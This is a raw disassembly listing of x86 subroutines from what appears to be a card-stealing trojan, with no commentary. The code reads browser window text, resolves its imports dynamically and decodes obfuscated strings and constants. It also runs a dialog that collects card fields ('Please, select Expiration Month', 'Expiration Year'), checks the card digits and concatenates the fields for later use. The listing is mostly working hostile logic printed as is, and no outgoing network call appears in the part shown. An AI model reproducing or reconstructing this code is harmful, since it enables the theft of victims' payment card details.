jmp short loc_43C516
; ---------------------------------------------------------------------------
loc_43C4AC: ; CODE XREF: sub_43C480+99�j
movzx eax, [ebp+arg_8]
cmp edi, eax
jb short loc_43C4BF
mov al, [esi+edi]
cmp al, 2Fh
jz short loc_43C4BF
cmp al, 2Eh
jnz short loc_43C4D8
loc_43C4BF: ; CODE XREF: sub_43C480+32�j
; sub_43C480+39�j
movzx eax, byte ptr [esi+edi]
push eax
push offset byte_44C729
lea eax, [ebp+var_7]
push eax
call ds:dword_44A634
add esp, 0Ch
jmp short loc_43C507
; ---------------------------------------------------------------------------
loc_43C4D8: ; CODE XREF: sub_43C480+3D�j
push offset dword_44C724
call sub_43DF30
push eax
push ebx
call ds:dword_445020
push offset dword_44C71C
call sub_43DF30
movzx edx, byte ptr [esi+edi]
push edx
push eax
lea edx, [ebp+var_7]
push edx
call ds:dword_44A634
add esp, 1Ch
loc_43C507: ; CODE XREF: sub_43C480+56�j
lea eax, [ebp+var_7]
push eax
push ebx
call ds:dword_445020
add esp, 8
inc edi
loc_43C516: ; CODE XREF: sub_43C480+2A�j
cmp edi, [ebp+var_4]
jb short loc_43C4AC
pop edi
pop esi
pop ebx
leave
retn
sub_43C480 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C520 proc near ; CODE XREF: sub_43C941+66�p
var_1008 = byte ptr -1008h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_444C70
push ebx
push esi
push edi
push offset word_44C70A
call sub_43DF30
pop ecx
push 0
push eax
push 0
push [ebp+arg_0]
call ds:dword_44A638 ; FindWindowExA
mov edi, eax
or edi, edi
jnz short loc_43C552
mov edi, [ebp+arg_0]
loc_43C552: ; CODE XREF: sub_43C520+2D�j
push offset dword_44C6F4
call sub_43DF30
pop ecx
push 0
push eax
push 0
push edi
call ds:dword_44A638 ; FindWindowExA
mov edi, eax
lea eax, [ebp+var_FFF]
push eax
push 0FFFh
push 0Dh
push edi
call ds:dword_445014 ; SendMessageA
mov eax, dword_44B0EC
cmp [ebp+eax+var_FFF], 20h
jnz short loc_43C5A2
mov eax, dword_44B0BC
cmp [ebp+eax+var_FFF], 20h
jz loc_43C65A
loc_43C5A2: ; CODE XREF: sub_43C520+6D�j
mov eax, dword_44B0C4
movsx edx, word_44B0B4
add eax, edx
cmp [ebp+eax+var_1008], 68h
jnz short loc_43C5D6
mov eax, dword_44B0C0
movsx edx, word_44B140
add eax, edx
cmp [ebp+eax+var_1008], 74h
jz loc_43C65A
loc_43C5D6: ; CODE XREF: sub_43C520+98�j
lea ecx, [ebp+var_FFF]
or eax, 0FFFFFFFFh
loc_43C5DF: ; CODE XREF: sub_43C520+C4�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43C5DF
mov ebx, dword_44B100
add ebx, 0Ah
cmp eax, ebx
jb short loc_43C65A
push offset byte_44C6EF
call sub_43DF30
movsx esi, word_44B0E4
movsx ebx, word_44B0A0
add esi, ebx
sub esi, 7
push esi
push eax
lea esi, [ebp+var_FFF]
push esi
call sub_43F8DA
add esp, 10h
mov ebx, dword_44B0BC
add ebx, 0FFFEh
cmp eax, ebx
jnz short loc_43C65A
push offset byte_44C6E9
call sub_43DF30
pop ecx
push eax
movsx esi, word_44B140
movsx ebx, word_44B108
add esi, ebx
sub esi, 0Ch
push esi
push 0Ch
push edi
call ds:dword_445014 ; SendMessageA
loc_43C65A: ; CODE XREF: sub_43C520+7C�j
; sub_43C520+B0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43C520 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C65F proc near ; CODE XREF: sub_43A503+DE�p
; sub_43A503+541�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, [ebp+arg_4]
push ebx
call ds:dword_445000 ; lstrlenW
mov edi, eax
push 0
push 0
mov eax, dword_44B110
add eax, 1FF4h
add eax, dword_44B0C0
push eax
push esi
push edi
push ebx
mov eax, dword_44B0D4
movsx edx, word_44B108
add eax, edx
sub eax, 5
push eax
push 0
call ds:dword_44500C ; WideCharToMultiByte
movsx eax, word_44B118
sub eax, 9
mov [esi+edi], al
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_43C65F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C6BA proc near ; CODE XREF: sub_43F328+24B�p
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
mov eax, dword_44B0D0
mov [ebp+var_4], eax
jmp short loc_43C6E3
; ---------------------------------------------------------------------------
loc_43C6CD: ; CODE XREF: sub_43C6BA+34�j
mov eax, 30h
mul [ebp+var_4]
mov [ebp+var_20], eax
and ds:dword_448370[eax], 0
inc [ebp+var_4]
loc_43C6E3: ; CODE XREF: sub_43C6BA+11�j
mov eax, dword_44B0C4
add eax, 60h
cmp [ebp+var_4], eax
jb short loc_43C6CD
push 0
call ds:dword_4470D0
push offset dword_44B254
push offset dword_44C8E0
push 7
push 0
push offset dword_44C820
call ds:dword_447620
mov ebx, eax
mov eax, dword_44B134
movsx edx, word_44B120
add eax, edx
sub eax, 0Ch
cmp ebx, eax
jnz loc_43C8DE
lea eax, [ebp+var_C]
push eax
mov eax, dword_44B254
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
movsx eax, word_44B120
sub eax, 8
cmp ebx, eax
jnz short loc_43C758
mov eax, dword_44B098
sub eax, 5
cmp [ebp+var_C], eax
jnz short loc_43C75D
loc_43C758: ; CODE XREF: sub_43C6BA+8F�j
jmp loc_43C873
; ---------------------------------------------------------------------------
loc_43C75D: ; CODE XREF: sub_43C6BA+9C�j
mov eax, dword_44B134
add eax, dword_44B094
sub eax, 4
mov [ebp+var_8], eax
jmp loc_43C867
; ---------------------------------------------------------------------------
loc_43C773: ; CODE XREF: sub_43C6BA+1B3�j
mov [ebp+var_38], 3
mov eax, [ebp+var_8]
mov [ebp+var_30], eax
lea eax, [ebp+var_3C]
push eax
lea esi, [ebp+var_38]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, dword_44B254
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, dword_44B0E8
movsx edx, word_44B13C
add eax, edx
sub eax, 0Dh
cmp ebx, eax
jnz loc_43C864
lea eax, [ebp+var_40]
push eax
push offset dword_44C900
mov eax, [ebp+var_3C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44B0A4
movsx edx, word_44B114
add eax, edx
sub eax, 8
cmp ebx, eax
jnz short loc_43C85B
lea eax, off_44B250
mov [ebp+var_24], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_44]
push eax
push offset dword_44C840
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44B12C
movsx edx, word_44B13C
add eax, edx
sub eax, 0Bh
cmp ebx, eax
jnz short loc_43C849
lea eax, [ebp+var_48]
push eax
push offset dword_44C840
push [ebp+var_44]
push [ebp+var_40]
call sub_43C9CE
add esp, 10h
mov [ebp+var_4C], eax
mov eax, [ebp+var_44]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43C849: ; CODE XREF: sub_43C6BA+16A�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43C85B: ; CODE XREF: sub_43C6BA+12C�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43C864: ; CODE XREF: sub_43C6BA+F9�j
inc [ebp+var_8]
loc_43C867: ; CODE XREF: sub_43C6BA+B4�j
mov eax, [ebp+var_C]
cmp [ebp+var_8], eax
jb loc_43C773
loc_43C873: ; CODE XREF: sub_43C6BA:loc_43C758�j
lea eax, off_44B274
mov [ebp+var_10], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_14]
push eax
push offset dword_44C830
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr ds:0[esi]
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr [esi+8]
lea eax, [ebp+var_1C]
push eax
push offset dword_44C830
push [ebp+var_14]
push dword_44B254
call sub_43C9CE
add esp, 10h
mov [ebp+var_18], eax
movsx ecx, word_44B140
sub ecx, 7
cmp eax, ecx
jnz short loc_43C8DE
mov eax, dword_44B254
push eax
mov esi, [eax]
call dword ptr [esi+8]
and dword_44B254, 0
loc_43C8DE: ; CODE XREF: sub_43C6BA+6C�j
; sub_43C6BA+210�j
pop edi
pop esi
pop ebx
leave
retn
sub_43C6BA endp
; =============== S U B R O U T I N E =======================================
sub_43C8E3 proc near ; CODE XREF: sub_43F328+25�p
push edi
push offset byte_44C6DB
call sub_43DF30
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B170, eax
test eax, eax
jnz short loc_43C916
push offset byte_44C6CD
call sub_43DF30
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B170, eax
loc_43C916: ; CODE XREF: sub_43C8E3+1A�j
cmp dword_44B170, 0
jz short loc_43C93F
mov eax, dword_44B128
movsx edx, word_44B108
add eax, edx
push eax
push dword_44B170
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44501C, eax
loc_43C93F: ; CODE XREF: sub_43C8E3+3A�j
pop edi
retn
sub_43C8E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C941 proc near ; DATA XREF: sub_43F211+1E�o
var_1FFF = byte ptr -1FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2000h
call sub_444C70
push ebx
push esi
push edi
push 1FFFh
lea eax, [ebp+var_1FFF]
push eax
push [ebp+arg_0]
call ds:dword_44ABA4 ; GetWindowTextA
push offset dword_44C6B8
call sub_43DF30
movsx edi, word_44B0A0
sub edi, 4
push edi
push eax
lea edi, [ebp+var_1FFF]
push edi
call sub_43F8DA
add esp, 10h
mov esi, dword_44B0E8
add esi, 0FFF4h
movsx ebx, word_44B108
add esi, ebx
cmp eax, esi
jz short loc_43C9AD
push [ebp+arg_0]
call sub_43C520
pop ecx
loc_43C9AD: ; CODE XREF: sub_43C941+61�j
xor eax, eax
inc eax
pop edi
pop esi
pop ebx
leave
retn 8
sub_43C941 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C9B7 proc near ; DATA XREF: .data:0044B25C�o
push ebp
mov ebp, esp
push offset dword_447604
call ds:dword_447A3C ; InterlockedIncrement
mov eax, ds:dword_447604
pop ebp
retn 4
sub_43C9B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C9CE proc near ; CODE XREF: sub_43C6BA+17B�p
; sub_43C6BA+1F9�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov eax, dword_44B0D4
mov esi, eax
add esi, dword_44B128
lea eax, [ebp+var_4]
push eax
push offset dword_44C860
mov eax, [ebp+arg_0]
push eax
mov ebx, [eax]
call dword ptr ds:0[ebx]
mov edi, eax
mov eax, dword_44B124
add eax, dword_44B0D4
sub eax, 2
cmp edi, eax
jz short loc_43CA11
xor eax, eax
jmp short loc_43CA74
; ---------------------------------------------------------------------------
loc_43CA11: ; CODE XREF: sub_43C9CE+3D�j
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+10h]
mov edi, eax
mov eax, dword_44B138
movsx edx, word_44B114
add eax, edx
sub eax, 5
cmp edi, eax
jnz short loc_43CA69
push [ebp+arg_C]
push [ebp+arg_4]
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+14h]
mov edi, eax
movsx eax, word_44B0F0
sub eax, 5
cmp edi, eax
jnz short loc_43CA60
mov esi, dword_44B0DC
sub esi, 7
loc_43CA60: ; CODE XREF: sub_43C9CE+87�j
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_43CA69: ; CODE XREF: sub_43C9CE+68�j
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, esi
loc_43CA74: ; CODE XREF: sub_43C9CE+41�j
pop edi
pop esi
pop ebx
leave
retn
sub_43C9CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43CA79 proc near ; CODE XREF: sub_43C2AC:loc_43C2AF�p
var_252 = byte ptr -252h
var_236 = dword ptr -236h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
lea eax, [ebp+var_114]
push eax
mov eax, dword_44B0A8
sub eax, 4
push eax
push 0
push 20h
push 0
call ds:dword_447A44
lea eax, [ebp+var_10]
push eax
call ds:dword_44825C ; GetSystemTime
movsx eax, word_44B090
mov edx, dword_44B098
movzx ecx, [ebp+var_6]
movzx ebx, [ebp+var_8]
mov esi, dword_44B0A8
add esi, 38h
imul ebx, esi
add ecx, ebx
movzx ebx, [ebp+var_A]
mov esi, dword_44B144
add esi, 18h
imul ebx, esi
movsx esi, word_44B0A0
lea esi, [esi+eax+35h]
imul ebx, esi
add ecx, ebx
movzx ebx, [ebp+var_E]
movsx esi, word_44B0F0
mov edi, dword_44B0B0
lea esi, [esi+edi+14h]
imul ebx, esi
mov esi, dword_44B098
add esi, 13h
imul ebx, esi
movsx esi, word_44B0B4
add esi, 37h
imul ebx, esi
add ecx, ebx
movzx ebx, [ebp+var_10]
mov esi, dword_44B104
lea eax, [eax+esi+8]
imul ebx, eax
movsx eax, word_44B114
lea eax, [edx+eax+16h]
mov edx, ebx
imul edx, eax
mov eax, dword_44B10C
add eax, 15h
imul edx, eax
mov eax, dword_44B0C0
add eax, 39h
add eax, dword_44B0D0
imul edx, eax
mov eax, ecx
add eax, edx
mov ds:dword_445024, eax
mov eax, dword_44B094
add eax, dword_44B098
sub eax, 4
mov [ebp+var_236], eax
lea esi, [ebp+var_252]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_114]
push edi
call sub_440E84
add esp, 144h
pop edi
pop esi
pop ebx
leave
retn
sub_43CA79 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43CBA8 proc near ; DATA XREF: .data:0044B24C�o
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_4]
mov eax, [ebp+arg_10]
mov word ptr [ebp+arg_10], ax
mov eax, dword_44B110
add eax, 0F2h
cmp edi, eax
jnz short loc_43CBD1
push [ebp+arg_14]
call sub_43A503
pop ecx
xor eax, eax
jmp short loc_43CBF3
; ---------------------------------------------------------------------------
loc_43CBD1: ; CODE XREF: sub_43CBA8+1A�j
movsx eax, word_44B0CC
add eax, 0FCh
cmp edi, eax
jnz short loc_43CBEE
push [ebp+arg_14]
call sub_43FA07
pop ecx
xor eax, eax
jmp short loc_43CBF3
; ---------------------------------------------------------------------------
loc_43CBEE: ; CODE XREF: sub_43CBA8+37�j
mov eax, 80020003h
loc_43CBF3: ; CODE XREF: sub_43CBA8+27�j
; sub_43CBA8+44�j
pop edi
pop ebp
retn 24h
sub_43CBA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43CBF8 proc near ; DATA XREF: sub_43E2B0+E29�o
; sub_43E2B0+E79�o ...
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_219 = byte ptr -219h
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_10F = byte ptr -10Fh
var_105 = byte ptr -105h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 230h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov eax, ebx
cmp eax, 100h
jz short loc_43CC29
jl loc_43D189
cmp eax, 111h
jz loc_43CCC1
jmp loc_43D189
; ---------------------------------------------------------------------------
loc_43CC29: ; CODE XREF: sub_43CBF8+19�j
cmp [ebp+arg_8], 9
jnz loc_43D189
mov edi, dword_44B0BC
dec edi
jmp short loc_43CCA7
; ---------------------------------------------------------------------------
loc_43CC3C: ; CODE XREF: sub_43CBF8+C2�j
mov eax, 30h
mul edi
mov [ebp+var_208], eax
cmp ds:dword_448380[eax], esi
jnz short loc_43CC71
mov eax, 30h
mul edi
mov [ebp+var_20C], eax
push ds:dword_448384[eax]
call ds:dword_447A40 ; SetFocus
jmp loc_43D189
; ---------------------------------------------------------------------------
loc_43CC71: ; CODE XREF: sub_43CBF8+58�j
mov eax, 30h
mul edi
mov [ebp+var_20C], eax
cmp ds:dword_448384[eax], esi
jnz short loc_43CCA6
mov eax, 30h
mul edi
mov [ebp+var_210], eax
push ds:dword_448388[eax]
call ds:dword_447A40 ; SetFocus
jmp loc_43D189
; ---------------------------------------------------------------------------
loc_43CCA6: ; CODE XREF: sub_43CBF8+8D�j
inc edi
loc_43CCA7: ; CODE XREF: sub_43CBF8+42�j
movsx eax, word_44B0A4
mov edx, dword_44B124
lea eax, [eax+edx+5Dh]
cmp edi, eax
jb short loc_43CC3C
jmp loc_43D189
; ---------------------------------------------------------------------------
loc_43CCC1: ; CODE XREF: sub_43CBF8+26�j
movsx eax, word_44B108
movsx edx, word_44B0E4
mov edi, eax
add edi, edx
sub edi, 0Bh
jmp short loc_43CCF2
; ---------------------------------------------------------------------------
loc_43CCD8: ; CODE XREF: sub_43CBF8+104�j
mov eax, 30h
mul edi
mov [ebp+var_208], eax
mov eax, ds:dword_44838C[eax]
cmp [ebp+arg_C], eax
jz short loc_43CCFE
inc edi
loc_43CCF2: ; CODE XREF: sub_43CBF8+DE�j
mov eax, dword_44B0FC
add eax, 61h
cmp edi, eax
jb short loc_43CCD8
loc_43CCFE: ; CODE XREF: sub_43CBF8+F7�j
movsx eax, word_44B0A0
add eax, 5Fh
cmp edi, eax
jz loc_43D189
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_20C], eax
push ds:dword_448378[eax]
call ds:dword_44ABA4 ; GetWindowTextA
mov eax, dword_44B0BC
movsx edx, word_44B108
add eax, edx
mov byte ptr [ebp+eax+var_20C+2], 4Bh
mov eax, dword_44B10C
add eax, dword_44B0B0
mov edx, dword_44B124
sub edx, 2
mov byte ptr [ebp+eax+var_20C+1], dl
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_445020
add esp, 8
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_210], eax
push ds:dword_448380[eax]
call ds:dword_44ABA4 ; GetWindowTextA
movsx eax, word_44B0CC
add eax, dword_44B0B0
movsx eax, [ebp+eax+var_10F]
mov edx, dword_44B124
sub edx, 2
cmp eax, edx
jnz short loc_43CE06
mov eax, dword_44B100
movsx edx, word_44B0E4
add eax, edx
sub eax, 9
push eax
push 0
push offset aPleaseSelectEx ; "Please, select Expiration Month"
push 0
call ds:dword_44A640 ; MessageBoxA
mov eax, 30h
mul edi
mov [ebp+var_214], eax
push ds:dword_448380[eax]
call ds:dword_447A40 ; SetFocus
jmp loc_43D189
; ---------------------------------------------------------------------------
loc_43CE06: ; CODE XREF: sub_43CBF8+1CC�j
push offset byte_44C693
call sub_43DF30
push eax
lea edx, [ebp+var_204]
push edx
call ds:dword_445020
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_445020
add esp, 14h
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_214], eax
push ds:dword_448384[eax]
call ds:dword_44ABA4 ; GetWindowTextA
mov eax, dword_44B104
movsx eax, [ebp+eax+var_105]
movsx edx, word_44B140
movsx ecx, word_44B0E0
add edx, ecx
sub edx, 0Fh
cmp eax, edx
jnz short loc_43CEB7
mov eax, dword_44B0D0
mov edx, eax
add edx, eax
push edx
push 0
push offset aPleaseSelect_0 ; "Please, select Expiration Year"
push 0
call ds:dword_44A640 ; MessageBoxA
mov eax, 30h
mul edi
mov [ebp+var_218], eax
push ds:dword_448384[eax]
call ds:dword_447A40 ; SetFocus
jmp loc_43D189
; ---------------------------------------------------------------------------
loc_43CEB7: ; CODE XREF: sub_43CBF8+285�j
push offset byte_44C66F
call sub_43DF30
push eax
lea edx, [ebp+var_204]
push edx
call ds:dword_445020
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_445020
add esp, 14h
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_218], eax
push ds:dword_448388[eax]
call ds:dword_44ABA4 ; GetWindowTextA
mov eax, dword_44B148
add eax, dword_44B144
movsx eax, [ebp+eax+var_105]
mov edx, dword_44B0C4
movsx ecx, word_44B0B8
add edx, ecx
sub edx, 6
cmp eax, edx
jz loc_43D06B
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_43CF42: ; CODE XREF: sub_43CBF8+34F�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43CF42
mov edx, eax
mov ecx, dword_44B0D8
movsx eax, word_44B13C
add ecx, eax
sub ecx, 6
cmp edx, ecx
jb loc_43D06B
mov eax, dword_44B104
add eax, dword_44B10C
sub eax, 5
mov [ebp+var_105], al
jmp short loc_43CF9D
; ---------------------------------------------------------------------------
loc_43CF7B: ; CODE XREF: sub_43CBF8+3BE�j
movzx eax, [ebp+var_105]
mov al, [ebp+eax+var_103]
cmp al, 30h
jl short loc_43CF91
cmp al, 39h
jle short loc_43CF96
loc_43CF91: ; CODE XREF: sub_43CBF8+393�j
jmp loc_43D06B
; ---------------------------------------------------------------------------
loc_43CF96: ; CODE XREF: sub_43CBF8+397�j
add [ebp+var_105], 1
loc_43CF9D: ; CODE XREF: sub_43CBF8+381�j
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_43CFA6: ; CODE XREF: sub_43CBF8+3B3�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43CFA6
movzx ecx, [ebp+var_105]
cmp ecx, eax
jb short loc_43CF7B
movsx eax, word_44B11C
sub eax, 2
mov [ebp+var_104], al
jmp short loc_43D047
; ---------------------------------------------------------------------------
loc_43CFCA: ; CODE XREF: sub_43CBF8+468�j
mov al, [ebp+var_104]
mov [ebp+var_219], al
jmp short loc_43D001
; ---------------------------------------------------------------------------
loc_43CFD8: ; CODE XREF: sub_43CBF8+422�j
movzx eax, [ebp+var_219]
movsx eax, [ebp+eax+var_103]
movzx edx, [ebp+var_104]
movsx edx, [ebp+edx+var_103]
cmp eax, edx
jnz short loc_43D01C
add [ebp+var_219], 1
loc_43D001: ; CODE XREF: sub_43CBF8+3DE�j
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_43D00A: ; CODE XREF: sub_43CBF8+417�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D00A
movzx ecx, [ebp+var_219]
cmp ecx, eax
jb short loc_43CFD8
loc_43D01C: ; CODE XREF: sub_43CBF8+400�j
movzx eax, [ebp+var_219]
movzx edx, [ebp+var_104]
sub eax, edx
movsx edx, word_44B120
add edx, dword_44B0D0
sub edx, 5
cmp eax, edx
jg short loc_43D06B
add [ebp+var_104], 1
loc_43D047: ; CODE XREF: sub_43CBF8+3D0�j
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_43D050: ; CODE XREF: sub_43CBF8+45D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D050
movzx ecx, [ebp+var_104]
cmp ecx, eax
jb loc_43CFCA
jmp loc_43D102
; ---------------------------------------------------------------------------
loc_43D06B: ; CODE XREF: sub_43CBF8+33B�j
; sub_43CBF8+367�j ...
mov eax, dword_44B0B0
lea eax, [eax+eax+7C6h]
push eax
call ds:dword_44A630
push offset word_44C636
call sub_43DF30
mov [ebp-21Ch], eax
push offset byte_44C61F
call sub_43DF30
movsx edx, word_44B0B8
add edx, dword_44B0E8
sub edx, 8
push edx
push eax
mov edx, [ebp-21Ch]
push edx
push 0
call ds:dword_44A640 ; MessageBoxA
push offset byte_44C61B
call sub_43DF30
add esp, 10h
push eax
mov eax, 30h
mul edi
mov [ebp+var_220], eax
mov edx, eax
push ds:dword_448388[edx]
call ds:dword_44A654 ; SetWindowTextA
mov eax, 30h
mul edi
mov [ebp+var_224], eax
push ds:dword_448388[eax]
call ds:dword_447A40 ; SetFocus
jmp loc_43D189
; ---------------------------------------------------------------------------
loc_43D102: ; CODE XREF: sub_43CBF8+46E�j
push offset word_44C616
call sub_43DF30
push eax
lea edx, [ebp+var_204]
push edx
call ds:dword_445020
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_445020
mov eax, 30h
mul edi
mov [ebp+var_228], eax
push ds:dword_448378[eax]
call ds:dword_448224 ; DestroyWindow
lea eax, [ebp+var_204]
push eax
call ds:dword_44504C
add esp, 18h
push 5
mov eax, 30h
mul edi
mov [ebp+var_22C], eax
push ds:dword_448374[eax]
call ds:dword_44A658 ; ShowWindow
mov eax, 30h
mul edi
mov [ebp+var_230], eax
and ds:dword_448370[eax], 0
loc_43D189: ; CODE XREF: sub_43CBF8+1B�j
; sub_43CBF8+2C�j ...
movsx eax, word_44B130
mov edi, eax
add edi, dword_44B0B0
sub edi, 9
jmp loc_43D274
; ---------------------------------------------------------------------------
loc_43D1A0: ; CODE XREF: sub_43CBF8+686�j
mov eax, 30h
mul edi
mov [ebp+var_8], eax
cmp esi, ds:dword_448380[eax]
jnz short loc_43D1D7
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_C], eax
push ds:dword_448390[eax]
call ds:dword_44A60C ; CallWindowProcA
jmp loc_43D284
; ---------------------------------------------------------------------------
loc_43D1D7: ; CODE XREF: sub_43CBF8+5B9�j
mov eax, 30h
mul edi
mov [ebp+var_10], eax
cmp esi, ds:dword_448384[eax]
jnz short loc_43D20B
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_14], eax
push ds:dword_448394[eax]
call ds:dword_44A60C ; CallWindowProcA
jmp short loc_43D284
; ---------------------------------------------------------------------------
loc_43D20B: ; CODE XREF: sub_43CBF8+5F0�j
mov eax, 30h
mul edi
mov [ebp+var_18], eax
cmp esi, ds:dword_448388[eax]
jnz short loc_43D23F
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_1C], eax
push ds:dword_448398[eax]
call ds:dword_44A60C ; CallWindowProcA
jmp short loc_43D284
; ---------------------------------------------------------------------------
loc_43D23F: ; CODE XREF: sub_43CBF8+624�j
mov eax, 30h
mul edi
mov [ebp+var_20], eax
cmp esi, ds:dword_44837C[eax]
jnz short loc_43D273
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_24], eax
push ds:dword_44839C[eax]
call ds:dword_44A60C ; CallWindowProcA
jmp short loc_43D284
; ---------------------------------------------------------------------------
loc_43D273: ; CODE XREF: sub_43CBF8+658�j
inc edi
loc_43D274: ; CODE XREF: sub_43CBF8+5A3�j
mov eax, dword_44B0A8
add eax, 60h
cmp edi, eax
jb loc_43D1A0
loc_43D284: ; CODE XREF: sub_43CBF8+5DA�j
; sub_43CBF8+611�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
sub_43CBF8 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D28C proc near ; CODE XREF: sub_43F328+1EE�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov eax, [ebp+arg_0]
mov esi, [eax+3Ch]
mov ecx, esi
add ecx, eax
mov eax, [ecx+28h]
mov edx, [ebp+arg_0]
lea esi, [eax+edx+0Dh]
movzx eax, byte ptr [esi]
